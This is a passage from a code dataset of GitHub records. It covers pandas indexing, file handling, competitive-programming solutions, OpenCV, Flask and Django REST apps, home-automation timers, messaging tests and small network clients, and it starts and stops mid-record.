f[f[\"a\"] <= 3][\"b\"] = f[f[\"a\"] <= 3][\"b\"] / 10\n# ```\n\n# %% Collapsed=\"false\"\n# Correct way\nf = pd.DataFrame({\"a\": [1, 2, 3, 4, 5], \"b\": [10, 20, 30, 40, 50]})\nf.loc[f[\"a\"] <= 3, \"b\"] = f.loc[f[\"a\"] <= 3, \"b\"] / 10\nf\n\n# %% [markdown] Collapsed=\"false\"\n# ## Multidimensional indexing\n\n# %% [markdown] Collapsed=\"false\"\n#
\n# Techniques of note\n#\n# - `pd.IndexSlice` for easy slicing of MultiIndexes\n#
    \n\n# %% Collapsed=\"false\"\nhdf = df.set_index(\n [\"unique_carrier\", \"origin\", \"dest\", \"tail_num\", \"fl_date\"]\n).sort_index()\nhdf[hdf.columns[:4]].head()\n\n# %% [markdown] Collapsed=\"false\"\n# Selecting outermost index\n\n# %% Collapsed=\"false\"\nhdf.loc[[\"AA\", \"DL\", \"US\"], [\"dep_time\", \"dep_delay\"]]\n\n# %% [markdown] Collapsed=\"false\"\n# Selecting first two using a tuple `()`.\n\n# %% Collapsed=\"false\"\nhdf.loc[([\"AA\", \"DL\", \"US\"], [\"ORD\", \"DSM\"]), [\"dep_time\", \"dep_delay\"]]\n\n# %% [markdown] Collapsed=\"false\"\n# Selecting only second index using `pd.IndexSlice`.\n\n# %% Collapsed=\"false\"\nhdf.loc[pd.IndexSlice[:, [\"ORD\", \"DSM\"]], [\"dep_time\", \"dep_delay\"]]\n\n# %% Collapsed=\"false\"\npd.IndexSlice[:, ['ORD', 'DSM']]\n\n# %% Collapsed=\"false\"\n","repo_name":"paw-lu/modern-pandas","sub_path":"modern-pandas/1_intro.py","file_name":"1_intro.py","file_ext":"py","file_size_in_byte":3620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"25098180784","text":"import jatekvezerles\r\n\r\n#Ranglista fájl beolvasása meghívja a játékos_adatok osztályt és ilyen listát hoz létre melyet rendezz összeg szerint\r\ndef ranglista_beolvas():\r\n try:\r\n f = open(\"ranglista.txt\",\"rt\",encoding=\"utf-8\")\r\n lista =[]\r\n for sor in f:\r\n sor = sor.rstrip(\"\\n\")\r\n darabok = sor.split(\":\")\r\n adat = jatekvezerles.jatekos_adatok(darabok[0],darabok[1],darabok[2])\r\n lista.append(adat)\r\n f.close()\r\n lista.sort(key=lambda x: x.osszeg,reverse=True)\r\n return lista\r\n except FileNotFoundError as e:\r\n print(\"Nem található a fájl (ranglista.txt)\", e)\r\n\r\n#Eredmények kiírása a ranglistába\r\ndef ranglista_kiir(lista):\r\n try:\r\n f = open(\"ranglista.txt\",\"a+\",encoding=\"utf-8\")\r\n for i in lista:\r\n f.write(\"\\n\")\r\n f.write(\"{}:{}:{}\".format(i.nev,i.nehezseg,i.osszeg))\r\n f.close()\r\n except FileNotFoundError as e:\r\n print(\"Nem található a fájl (ranglista.txt)\",e)\r\n\r\n#Kerdesek beolvasása egy kerdes osztályú listát ad vissza\r\ndef kerdesek_beolvas():\r\n try:\r\n f = open(\"kerdesek.txt\",\"rt\",encoding=\"utf-8\")\r\n lista =[]\r\n for sor in f:\r\n darabok = sor.split(\"\\t\")\r\n adat = jatekvezerles.kerdes_adatok(int(darabok[0]), darabok[1], darabok[2], darabok[3], darabok[4], darabok[5], darabok[6], darabok[7])\r\n lista.append(adat)\r\n f.close()\r\n return lista\r\n except FileNotFoundError as e:\r\n print(\"Nem található a fájl (kerdesek.txt)\", e)\r\n\r\n\r\n\r\n\r\n","repo_name":"varben685/apiramis","sub_path":"fajlkezeles.py","file_name":"fajlkezeles.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19102523237","text":"#!/usr/bin/env python3\nimport sys\nfrom collections import deque, Counter\nfrom heapq import heappop, heappush\nfrom bisect import bisect_right\nfrom itertools import accumulate\n\nsys.setrecursionlimit(10**6)\nINF = 10**12\nm = 10**9 + 7\n\n\ndef main():\n T = int(input())\n for _ in range(T):\n ax, ay, bx, by, cx, cy = map(int, input().split())\n minx = min([ax, bx, cx])\n miny = min([ay, by, cy])\n # print(minx, miny)\n\n # 完成位置の石の向きを調べる\n ax -= minx\n bx -= minx\n cx -= minx\n ay -= miny\n by -= miny\n cy -= miny\n d = {(0, 0), (0, 1), (1, 0), (1, 1)} # 石がない場所\n d -= {(ax, ay)}\n d -= {(bx, by)}\n d -= {(cx, cy)}\n d = list(d)\n z = d[0][0] + d[0][1]*2\n s = 3 # 初期位置の石の向き\n # print(z)\n\n # 石の位置を第一象限に写す\n if 
minx >= 0 and miny < 0:\n miny = -miny\n z = [2, 3, 0, 1][z]\n s = 3\n miny -= 1\n elif minx < 0 and miny >= 0:\n minx = -minx\n z = [1, 0, 3, 2][z]\n s = 0\n minx -= 1\n elif minx < 0 and miny < 0:\n minx = -minx\n miny = -miny\n z = [3, 2, 1, 0][z]\n s = 2\n minx -= 1\n miny -= 1\n\n print(minx, miny, z, s)\n\n ans = 0\n if minx == 0 and miny == 0:\n if z != s:\n ans += 1\n else:\n if z != 3:\n ans += 1\n if s == 0:\n ans -= 1\n elif s == 1 and miny > 0:\n ans -= 1\n elif s == 2 and minx > 0:\n ans -= 1\n ans += 3 * min(minx, miny)\n minx -= min(minx, miny)\n miny -= min(minx, miny)\n ans += 2 * max(0, minx-1)\n ans += 2 * max(0, miny-1)\n\n print(ans)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ryu19-1/atcoder_python","sub_path":"arc109/d/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5400096191","text":"import socket\n\nsexo = input(\"Digite o sexo (M ou F): \")\naltura = float(input(\"Digite a altura (m): \"))\n\nmensagem = sexo + \"\\n\" + str(altura)\n\n#============================\n\nclient = socket.socket()\n\nclient.connect((\"127.0.0.1\", 8888))\n\nbuf = mensagem.encode(\"utf8\")\n\nclient.send(len(buf).to_bytes(4, \"little\"))\nclient.send(buf)\n\n#============================\n\nbuf = bytearray()\n\nwhile len(buf) < 4:\n buf += client.recv(4)\n\nmessage_len = int.from_bytes(buf[0:4], \"little\")\n\nbuf = buf[4:]\n\nwhile len(buf) < message_len:\n buf += client.recv(message_len - len(buf))\n\nmensagem = buf.decode(\"utf8\")\n\n#============================\n\nprint()\nprint(\"Peso Ideal (kg): \" + mensagem)\n\nclient.close()","repo_name":"SD-CC-UFG/leonardo.basilio.sd.ufg","sub_path":"08-23 Lista 1/04-client.py","file_name":"04-client.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43394745637","text":"# %%\n# 10.1 使用函数cv2.Canny()获取图像的边缘,并尝试使用不同的thredshold1和thredshold2,来得到边缘\n\nimport cv2\n\no = cv2.imread(\"lesson_10\\\\danger.png\", cv2.IMREAD_GRAYSCALE)\nr1 = cv2.Canny(o, 150, 220)\nr2 = cv2.Canny(o, 32, 128)\ncv2.imshow(\"original\", o)\ncv2.imshow(\"result1\", r1)\ncv2.imshow(\"result2\", r2)\ncv2.waitKey()\ncv2.destroyAllWindows()","repo_name":"lazy606/myPyOpenCV","sub_path":"lesson_10/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42467637140","text":"# linear search in python\n\n# function for linear search\ndef linearSearch(list, n, key):\n for i in range(0,n):\n if(list[i]==key):\n return i\n return -1\nprint(\"Linear Search in Python\")\nlist1 = [1,3,4,6,12,45]\nkey = int(input(\"Enter the element you want to search: \"))\nn = len(list1)\nret = linearSearch(list1, n, key)\nif(ret == -1):\n print(\"Element not found at any index.\")\nelse:\n print(\"Element found at index \", ret)\nprint() \n\n# Binary Search in Python\n# iterative method\nprint(\"Binary Search in python\")\ndef binarySearch(list, n):\n low = 0\n high = len(list) - 1\n mid = 0\n while low <= high:\n mid = (high+low)//2\n if list[mid]n:\n high = mid - 1\n else:\n return mid\n return -1\n \nlist1 = [12, 23, 3, 45, 67]\nn = 45\nresult = binarySearch(list1, n)\nif result != -1:\n print(\"Element found at index \", result)\nelse:\n print(\"Element not found\") \nprint() \n\n\n# Samragyi 
Vats\n#-----------------------------","repo_name":"samragyi/2020A1R011_COM-511_python","sub_path":"activity4_September26-2022/activity4_searching.py","file_name":"activity4_searching.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71729254646","text":"import argparse\nimport random\nimport time\nimport math\n\nfrom pythonosc import osc_message_builder\nfrom pythonosc import udp_client\n\nstart_time = time.time()\n\ndef set_red_pulse():\n msg = osc_message_builder.OscMessageBuilder(address = \"/dmx/universe/5000/7\")\n v = time.time() - start_time\n v *= 30\n v /= 2*math.pi\n v = math.sin(v)\n v = math.fabs(v)\n msg.add_arg(v)\n msg = msg.build()\n client.send(msg)\n\ndef set_bulb_pulse():\n msg = osc_message_builder.OscMessageBuilder(address = \"/dmx/universe/5000/15\")\n v = time.time() - start_time\n v *= 100\n v /= 2*math.pi\n v = math.sin(v)\n v = math.fabs(v)\n msg.add_arg(v*0.25)\n msg = msg.build()\n client.send(msg)\n\ndef set_green_zero():\n msg = osc_message_builder.OscMessageBuilder(address = \"/dmx/universe/5000/8\")\n msg.add_arg(0)\n msg = msg.build()\n client.send(msg)\n\ndef set_blue_zero():\n msg = osc_message_builder.OscMessageBuilder(address = \"/dmx/universe/5000/9\")\n msg.add_arg(0)\n msg = msg.build()\n client.send(msg)\n\ndef send(receiver, v):\n msg = osc_message_builder.OscMessageBuilder(address = \"/dmx/universe/5000/\"+str(receiver))\n msg.add_arg(v)\n msg = msg.build()\n client.send(msg)\n\ndef set_bulb_noisy():\n base = 0.08\n factor = 0.08\n delay = 0.15\n boost = 0.2\n v = base\n v += (random.random()*factor)\n send(1,v)\n v = base\n v += (random.random()*factor)\n time.sleep(0.01)\n send(2,v)\n v = base\n v += (random.random()*factor)\n time.sleep(0.01)\n send(3,v)\n if random.random() > 0.995:\n delay += random.random()*0.65\n v += boost\n send(1,v)\n time.sleep(delay)\n send(1,0)\n send(2,v)\n time.sleep(delay)\n send(2,0)\n send(3,v)\n time.sleep(delay)\n send(3,0)\n v = base\n v += (random.random()*factor) \n if random.random() > 0.999:\n v += boost\n send(1,v)\n send(2,v)\n send(3,v)\n time.sleep(delay)\n\n\n\n\n\n\n\n\n\ndef set_neon():\n msg = osc_message_builder.OscMessageBuilder(address = \"/dmx/universe/5000/4\")\n v = 0\n flash = False\n if random.random() > 0.991:\n flash = True\n v+=0.8\n msg.add_arg(v)\n msg = msg.build()\n client.send(msg)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--ip\", default=\"127.0.0.1\",\n help=\"The ip of the OSC server\")\n parser.add_argument(\"--port\", type=int, default=7770,\n help=\"The port the OSC server is listening on\")\n args = parser.parse_args()\n\n client = udp_client.UDPClient(args.ip, args.port)\n\n start_time = time.time()\n\n while True:\n set_bulb_noisy()\n time.sleep(0.05)\n set_neon()\n time.sleep(0.05)\n\n pass\n\n","repo_name":"bestimmaa/ola-osc-vj-bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"3418704197","text":"class Solution:\n def spiralOrder(self, matrix: List[List[int]]) -> List[int]:\n if not matrix:\n return 0\n direction = 0\n moves = [(0, 1), (1, 0), (0, -1), (-1, 0)]\n visited = [[False for x in range(len(matrix[0]))] for y in range(len(matrix))]\n pos = [0, 0]\n order = []\n order.append(matrix[0][0])\n s = set()\n while not visited[pos[0]][pos[1]]:\n print(visited)\n 
visited[pos[0]][pos[1]] = True\n move = moves[direction]\n new_y = pos[0] + move[0]\n new_x = pos[1] + move[1]\n if 0 <= new_x < len(matrix[0]) and 0<=new_y < len(matrix) and not visited[new_y][new_x]:\n order.append(matrix[new_y][new_x])\n pos = [new_y, new_x]\n else:\n direction += 1\n direction %= 4\n move = moves[direction]\n new_y = pos[0] + move[0]\n new_x = pos[1] + move[1]\n if not (0 <= new_x < len(matrix[0]) and 0<= new_y < len(matrix)) or visited[new_y][new_x]:\n break\n order.append(matrix[new_y][new_x])\n pos = [new_y, new_x]\n return order\n","repo_name":"wilsonwid/leetcode","sub_path":"spiral-matrix/spiral-matrix.py","file_name":"spiral-matrix.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"8865074574","text":"from crypt import methods\nfrom flask_app import app\nfrom flask import render_template, redirect, session, flash, request\nfrom flask_app.models.user_model import User\nfrom flask_app.models.recipe_model import Recipe\n\n@app.route('/recipes/new')\ndef new_recipe_form():\n return render_template('recipe_new.html')\n\n@app.route(\"/recipes/create\", methods=['POST'])\ndef create_recipe():\n if 'user_id' not in session:\n return redirect('/')\n if not Recipe.validator(request.form):\n return redirect('/recipes/new')\n data = {\n \"name\" : request.form['name'],\n \"description\" : request.form['description'],\n \"instructions\" : request.form['instructions'],\n \"date\" : request.form['date'],\n \"time\" : request.form['time'],\n \"user_id\" : session['user_id']\n }\n Recipe.create(data)\n return redirect('/dashboard')\n\n@app.route('/recipes/')\ndef one_recipe(id):\n if 'user_id' not in session:\n return redirect('/')\n user_data = {\n 'id' : session['user_id']\n }\n logged_user = User.get_by_id(user_data)\n this_recipe = Recipe.get_by_id({'id' : id})\n return render_template('recipe_one.html', this_recipe=this_recipe, logged_user=logged_user)\n \n\n@app.route('/recipes//edit')\ndef edit_recipe(id):\n if 'user_id' not in session:\n return redirect('/')\n this_recipe = Recipe.get_by_id({'id' : id})\n return render_template('recipe_edit.html', this_recipe=this_recipe)\n\n@app.route('/recipes//update', methods=['POST'])\ndef update_recipe(id):\n if not Recipe.validator(request.form):\n return redirect(f'/recipes/{id}/edit')\n recipe_data = {\n **request.form, \n 'id' : id\n }\n Recipe.update(recipe_data)\n return redirect('/dashboard')\n\n@app.route('/recipes//delete')\ndef delete_recipes(id):\n this_recipe = Recipe.get_by_id({'id' : id})\n if not this_recipe.user_id == session['user_id']:\n flash(\"You can't remove a recipe you did not add\")\n return redirect('/dashboard')\n Recipe.delete({'id' : id})\n return redirect('/dashboard')","repo_name":"ErikMejiaCode/Assignments-Coding-Dojo","sub_path":"SQL/core/recipes/flask_app/controllers/recipes_controller.py","file_name":"recipes_controller.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26819240094","text":"# performance related topics\r\n\r\nimport cv2\r\nimport numpy as np\r\nimport os\r\nimport timeit\r\n\r\nprint(cv2.useOptimized())\r\n\r\nIMGDIR=\"D:/apidoc/python/OpenCV-3.2.0\"\r\ncv2.namedWindow('fish', cv2.WINDOW_NORMAL)\r\nimg = cv2.imread(IMGDIR + os.sep + \"roi.jpg\", )\r\ncv2.setUseOptimized(False)\r\nt1 = cv2.getTickCount()\r\ncv2.medianBlur(img,49)\r\nt2 = 
cv2.getTickCount()\r\n\r\ncv2.setUseOptimized(False)\r\ncv2.medianBlur(img,49)\r\ncv2.setUseOptimized(True)\r\nt3 = cv2.getTickCount()\r\ncv2.medianBlur(img,49)\r\nt4 = cv2.getTickCount()\r\n\r\ntm = timeit.Timer(\"cv2.medianBlur(img,49)\", 'import cv2\\nimport os\\nIMGDIR=\"D:/apidoc/python/OpenCV-3.2.0\"\\nimg = cv2.imread(IMGDIR + os.sep + \"roi.jpg\", )\\ncv2.setUseOptimized(False)').timeit(20)\r\nprint(tm)\r\ntm = timeit.Timer(\"cv2.medianBlur(img,49)\", 'import cv2\\nimport os\\nIMGDIR=\"D:/apidoc/python/OpenCV-3.2.0\"\\nimg = cv2.imread(IMGDIR + os.sep + \"roi.jpg\", )\\ncv2.setUseOptimized(True)').timeit(20)\r\nprint(tm)\r\nprint(t2 - t1, t3 - t2, t4 - t3)\r\n","repo_name":"staugust/leetcode","sub_path":"python/opcv/cp11.py","file_name":"cp11.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20160788071","text":"import appdaemon.plugins.hass.hassapi as hass\r\n\r\nfrom dateutil import parser\r\n\r\n\r\nclass DailyReactivationTimer(hass.Hass):\r\n current_timer_handle = None\r\n\r\n def initialize(self):\r\n self.listen_state(self.start_timer,\r\n self.args[\"observed_input_datetime\"])\r\n self.listen_state(self.start_timer,\r\n self.args[\"observed_input_boolean\"])\r\n\r\n def start_timer(self, entity, attribute, old, new, kwargs):\r\n time_string = self.get_state(self.args[\"observed_input_datetime\"])\r\n reactivation_time = parser.parse(time_string)\r\n timer_callback = self.run_daily(self.reactivate_input_bool,\r\n reactivation_time.time())\r\n if self.current_timer_handle:\r\n self.cancel_timer(self.current_timer_handle)\r\n self.current_timer_handle = timer_callback\r\n\r\n def reactivate_input_bool(self, kwargs):\r\n self.log(\"Reactivated: \" + str(self.args[\"observed_input_boolean\"]))\r\n self.turn_on(self.args[\"observed_input_boolean\"])\r\n\r\n\r\nclass ReactivationTimer(hass.Hass):\r\n current_timer_handle = None\r\n\r\n def initialize(self):\r\n self.listen_state(self.start_timer,\r\n self.args[\"observed_input_boolean\"], new=\"off\")\r\n self.listen_state(self.stop_timer,\r\n self.args[\"observed_input_boolean\"], new=\"on\")\r\n\r\n def start_timer(self, entity, attribute, old, new, kwargs):\r\n time_string = self.get_state(self.args[\"reactivation_timeout\"])\r\n timer_interval_datetime = parser.parse(time_string)\r\n\r\n timer_interval_in_seconds = timer_interval_datetime.hour * 60 * 60 + \\\r\n timer_interval_datetime.minute * 60 + timer_interval_datetime.second\r\n\r\n self.current_timer_handle = self.run_in(\r\n self.reactivate_input_bool, timer_interval_in_seconds)\r\n\r\n def stop_timer(self, entity, attribute, old, new, kwargs):\r\n self.cancel_timer(self.current_timer_handle)\r\n\r\n def reactivate_input_bool(self, kwargs):\r\n self.log(\"Reactivated: \" + str(self.args[\"reactivation_timeout\"]))\r\n self.turn_on(self.args[\"observed_input_boolean\"])\r\n","repo_name":"Robert1991/appdaemon","sub_path":"apps/general/input_boolean.py","file_name":"input_boolean.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4005748283","text":"#'/home/pc/Downloads/bt.css'\n#'/home/pc/Music/texto.txt'\n#\"192.168.1.10\"\nimport requests \nimport json\nimport random\nclass Consola():\n def Ejecutar(self):\n self.lista_usr=['Liam','Olivia',\n 'Noah','Emma',\n 'Oliver','Ava',\n 'William','Sophia',\n 'Elijah','Isabella',\n 'James','Charlotte',\n 
'Benjamin','Amelia',\n 'Lucas','Mia',\n 'Mason','Harper',\n 'Ethan','Evelyn'\n ]\n self.cadena=None\n self.ip=None\n while True:\n print(\"Aplicacion De Escritorio\")\n print(\"1) Ingresar Ruta Archivo\")\n print(\"2) Ingresar ip \")\n print(\"3) Ver Datos \")\n print(\"4) Enviar Datos \")\n print(\"5) Salir \")\n \n entrada = input(\"Ingresar Opcion \\n\")\n if entrada == 1:\n self.Uno()\n elif entrada == 2:\n self.Dos()\n elif entrada == 3:\n self.Tres()\n elif entrada == 4:\n self.Cuatro()\n elif entrada == 5:\n self.Cinco()\n \n\n def Uno(self):\n entrada = input(\"Ingresar Ruta Del Archivo\")\n try:\n archivo = open(entrada,\"r\") \n self.cadena =archivo.read()\n print(\"Archivo Cargado A Memoria\")\n except:\n print(\"Error Ruta Incorrecta\")\n \n def Dos(self):\n entrada = input(\"Ingresar Direccion ip \\n\")\n self.ip = entrada\n\n def Tres(self):\n print(self.cadena)\n print(\"\\n\")\n \n def Cuatro(self):\n try:\n puerto = \":5050\"\n \n if self.ip is None:\n print(\"No Se Ingreso Una ip\")\n return \n if self.cadena is None or self.cadena ==\"\":\n print(\"No Se Ingreso Un Mensaje Para Enviar\")\n return \n linea = self.cadena.split(\"\\n\")\n for msg in linea:\n usuario = random.choice(self.lista_usr)\n if msg != \"\":\n jison ={\"usuario\":usuario,'mensaje':msg}\n response = requests.post(\"http://\"+self.ip+puerto+\"/server\",\n params=jison)\n print(response.json())\n\n print(\"---------------------TERMINADO---------------------------\")\n input(\"\")\n except :\n print(\"Error De Conexion Con El Servidor\") \n def Cinco(self):\n exit()\n\n\n\n\napp = Consola()\napp.Ejecutar()","repo_name":"esnorki2008/SistemasOperativos1","sub_path":"Proyecto1/ClienteEscritorio/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17758176773","text":"from app import db\n\n\nclass Count(db.Document):\n model = db.StringField()\n count = db.IntField()\n\n @classmethod\n def get_number(cls, model):\n model_name = model.__name__.lower()\n count = Count.objects(model=model_name).first()\n if not count:\n count = Count(\n model=model_name,\n count=10000,\n )\n count.save()\n return count.count\n else:\n number = count.count + 1\n count.update(count=number)\n return number\n","repo_name":"kohihi/cutedog","sub_path":"model/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9993080198","text":"import logging\nimport os\n\ndef get_logger(args):\n # create logger\n logger = logging.getLogger(\"MAIN\")\n logger.setLevel(logging.DEBUG)\n\n # create formatter\n BASIC_FORMAT = \"[%(asctime)s]-[%(levelname)s]\\t%(message)s\"\n DATE_FORMAT = '%Y-%m-%d %H:%M:%S'\n formatter = logging.Formatter(BASIC_FORMAT, DATE_FORMAT)\n\n # create consle handler and set level to DEBUG\n ch = logging.StreamHandler()\n ch.setFormatter(formatter)\n ch.setLevel(logging.DEBUG)\n logger.addHandler(ch)\n # create file handler and set level to WARNING\n log_file = os.path.join(args.save_dir, \"log\")\n if not os.path.exists(os.path.dirname(log_file)):\n os.makedirs(os.path.dirname(log_file))\n print(\"Log save to %s\" % log_file)\n fh = logging.FileHandler(filename=log_file)\n fh.setFormatter(formatter)\n fh.setLevel(logging.INFO)\n logger.addHandler(fh)\n\n return 
logger","repo_name":"zzz47zzz/CET","sub_path":"utils/logger_utils.py","file_name":"logger_utils.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"76"} +{"seq_id":"73886286645","text":"from pathlib import Path\n\nimport pytest\n\nfrom movici_simulation_core.messages import (\n AcknowledgeMessage,\n ClearDataMessage,\n DataMessage,\n ErrorMessage,\n GetDataMessage,\n NewTimeMessage,\n PathMessage,\n PutDataMessage,\n QuitMessage,\n RegistrationMessage,\n ResultMessage,\n UpdateMessage,\n UpdateSeriesMessage,\n dump_message,\n load_message,\n)\n\n\n@pytest.mark.parametrize(\n \"message\",\n [\n RegistrationMessage(pub={\"a\": None}, sub={\"b\": None}),\n UpdateMessage(1, \"key\", \"address\"),\n UpdateMessage(1, \"key\", \"address\", origin=\"some_model\"),\n UpdateMessage(1, None, None),\n UpdateSeriesMessage(updates=[UpdateMessage(1, None, None), UpdateMessage(1, \"a\", \"b\")]),\n ResultMessage(\"key\", \"address\", next_time=1),\n ResultMessage(None, None, None),\n NewTimeMessage(1),\n AcknowledgeMessage(),\n QuitMessage(),\n GetDataMessage(\"key\", {\"some\": \"filter\"}),\n PutDataMessage(\"key\", b\"some_data\"),\n ClearDataMessage(\"key\"),\n DataMessage(b\"some_data\"),\n ErrorMessage(),\n PathMessage(path=Path(\"/some/path\")),\n PathMessage(path=None),\n ],\n)\ndef test_serialization_deserialization(message):\n assert message == load_message(*dump_message(message))\n\n\ndef test_dump_update_message():\n assert dump_message(UpdateMessage(1, None, None, origin=\"some_model\")) == [\n b\"UPDATE\",\n b'{\"timestamp\": 1, \"key\": null, \"address\": null, \"origin\": \"some_model\"}',\n ]\n\n\ndef test_dump_update_series():\n assert dump_message(\n UpdateSeriesMessage(\n updates=[\n UpdateMessage(1, None, None),\n UpdateMessage(2, \"some_key\", \"some_address\"),\n ]\n )\n ) == [\n b\"UPDATE_SERIES\",\n b'{\"timestamp\": 1, \"key\": null, \"address\": null, \"origin\": null}',\n b'{\"timestamp\": 2, \"key\": \"some_key\", \"address\": \"some_address\", \"origin\": null}',\n ]\n\n\ndef test_load_update_series_message():\n assert load_message(\n *[\n b\"UPDATE_SERIES\",\n b'{\"timestamp\": 1, \"key\": null, \"address\": null, \"origin\": null}',\n b'{\"timestamp\": 2, \"key\": \"some_key\", \"address\": \"some_address\", \"origin\": null}',\n ]\n ) == UpdateSeriesMessage(\n updates=[\n UpdateMessage(1, None, None),\n UpdateMessage(2, \"some_key\", \"some_address\"),\n ]\n )\n\n\ndef test_dump_put_data_message():\n assert dump_message(PutDataMessage(\"key\", b\"data\")) == [b\"PUT\", b\"key\", b\"data\"]\n\n\ndef test_dump_update_data_message():\n assert dump_message(DataMessage(b\"some_data\")) == [b\"DATA\", b\"some_data\"]\n\n\ndef test_error_on_invalid_message_content():\n with pytest.raises(ValueError):\n ResultMessage(key=None, address=\"something\")\n\n\ndef test_update_series_message_has_no_timestamp_when_emtpy():\n assert UpdateSeriesMessage([]).timestamp is None\n","repo_name":"nginfra/movici-simulation-core","sub_path":"tests/networking/test_messages.py","file_name":"test_messages.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16379401125","text":"from django.urls import reverse\nfrom rest_framework import status\nfrom authentication.tests.test_jwt import AuthenticationTest\nfrom rest_framework.test import APITestCase\nfrom rest_framework.test import APIClient\nfrom factor.models 
import Factor\n\n\nclass FactorAppTest(AuthenticationTest, APITestCase):\n\n def setUp(self):\n\n # if you want use force authenticate:\n self.me = super().setUp()\n self.client = APIClient()\n self.client.force_authenticate(user=self.me)\n\n # if want to use by token call, use like below:\n # super().test_api_jwt()\n # self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + self.tkn['access'])\n\n self.factor = Factor.objects.create(Description='XYZ',\n UserAddress='T234',\n ShipPrice=85.2,\n UserId=self.me)\n\n self.factor.save()\n # Factor management urls:\n self.create_read_url = reverse('factor_operation-list')\n self.read_partial_delete_url = reverse('factor_operation-detail', kwargs={'pk': self.factor.FactorId})\n\n # admin control over Factor:\n def test_factor_list(self):\n \"\"\" render factors list\n Method : GET\n Permission : IsAdmin\n Authentication : IsAuthenticated\n \"\"\"\n response = self.client.get(self.create_read_url)\n self.assertEquals(response.status_code, status.HTTP_200_OK)\n\n def test_factor_create(self):\n \"\"\" create new factor\n Method : POST\n Permission : IsAdmin\n Authentication : IsAuthenticated\n \"\"\"\n post = {'Description': 'XYZ',\n 'UserAddress': 'T234',\n 'ShipPrice': 85.2,\n 'UserId': self.me.pk}\n\n response = self.client.post(self.create_read_url, post)\n self.assertEquals(response.status_code, 201)\n\n def test_factor_detail(self):\n \"\"\" Get factor over FactorId as PK\n Method : GET/PK/\n Permission : IsAdmin\n Authentication : IsAuthenticated\n \"\"\"\n response = self.client.get(self.read_partial_delete_url)\n self.assertEquals(response.status_code, status.HTTP_200_OK)\n\n def test_factor_update(self):\n \"\"\" Update factor record over FactorId ad PK\n Method : PUT/PK/\n Permission : IsAdmin\n Authentication : IsAuthenticated\n \"\"\"\n data = {'Description': 'XYZe',\n 'UserAddress': 'Tw234',\n 'ShipPrice': 86.2,\n 'UserId': self.me.pk}\n\n response = self.client.put(self.read_partial_delete_url, data=data)\n self.assertEquals(response.status_code, status.HTTP_200_OK)\n\n def test_factor_partial_update(self):\n \"\"\" Particular update factor record over FactorId ad PK\n Method : PATCH/PK/\n Permission : IsAdmin\n Authentication : IsAuthenticated\n \"\"\"\n data = {'Description': 'please send in Gift packet'}\n\n response = self.client.patch(self.read_partial_delete_url, data=data)\n self.assertEquals(response.status_code, status.HTTP_200_OK)\n\n def test_factor_delete(self):\n \"\"\" Delete factor record over FactorId as PK\n Method : DELETE/PK/\n Permission : IsAdmin\n Authentication : IsAuthenticated\n \"\"\"\n response = self.client.delete(self.read_partial_delete_url)\n self.assertEquals(response.status_code, status.HTTP_204_NO_CONTENT)\n\n\n\n","repo_name":"H4medRostami/Kirpi","sub_path":"factor/tests/test_factor.py","file_name":"test_factor.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"9206489225","text":"\ndef load_gain_data(gain_data_file = 'gain_data.txt'):\n '''\n load the gain map:\n [('-30', 0x2072), ...]\n '''\n f = open(gain_data_file)\n result = [] \n for line in f.readlines():\n if line.strip():\n key, value = line.split('\\t')\n result.append([key, eval(value)])\n f.close()\n return result\n","repo_name":"mmjang/p440_pyqt","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} 
+{"seq_id":"19807728258","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport logging; logging.basicConfig(level=logging.INFO)\n#一行中书写多条句必须使用���号分隔每个语句,否则Python无法识别语句之间的间隔\nimport asyncio, os, json, time\nfrom datetime import datetime\n\nfrom aiohttp import web\n\ndef index(request):\n\treturn web.Response(text='

    你好!妳好(繁體字)

